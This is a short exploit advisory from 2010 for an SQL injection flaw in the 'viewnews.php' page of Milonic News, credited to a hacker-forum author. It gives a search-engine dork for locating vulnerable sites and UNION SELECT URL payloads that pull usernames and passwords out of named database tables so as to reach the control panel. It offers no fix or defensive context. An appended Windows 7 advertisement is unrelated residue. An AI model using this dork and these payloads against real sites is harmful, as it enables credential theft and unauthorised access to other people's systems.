# Exploit Title: Milonic News (viewnews) SQL Injection Vulnerability # Date: 5/1/2010 # Author: Err0R # Software Link: N/A # Version: N/A # Tested on: () # CVE : () # Code : 11010 ============================================================================= +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ----------------------------------------------------------------------------- ############################################################################ # (+) Title : Milonic News (viewnews) SQL Injection Vulnerability # (+) Auther: Err0R # (+) Site : http://sa-hacker.com/vb # (+) Email : a5q(AT)hotmail(dot)com ############################################################################ ----------------------------------------------------------------------------- # (+) dork : intext:"powered by Milonic" inurl:viewnews.php?id= ----------------------------------------------------------------------------- # (+) Exploit : /viewnews.php?ID=-136+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14-- Username :/viewnews.php?ID=-136+union+select+1,2,3,4,5,6,7,8,username,10,11,12,13,14+from+renewabl_mhpcompanies.experts-- Passoword: /viewnews.php?ID=-136+union+select+1,2,3,4,5,6,7,8,password,10,11,12,13,14+from+renewabl_mhpwebsite.users-- you come .. control panel ----------------------------------------------------------------------------- # (+) Greetz To :- ===================================================+ all member in www.Sa-hacker.com/vb | ++++++++++++++++++++++++++++++++++++++++++++ | Special To :Pepsi & Dr.X3 | ++++++++++++++++++++++++++++++++++++++++++++ | ===================================================+ ----------------------------------------------------------------------------- +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ============================================================================= ________________________________ Windows 7: Watch live TV, right from your laptop. Learn more.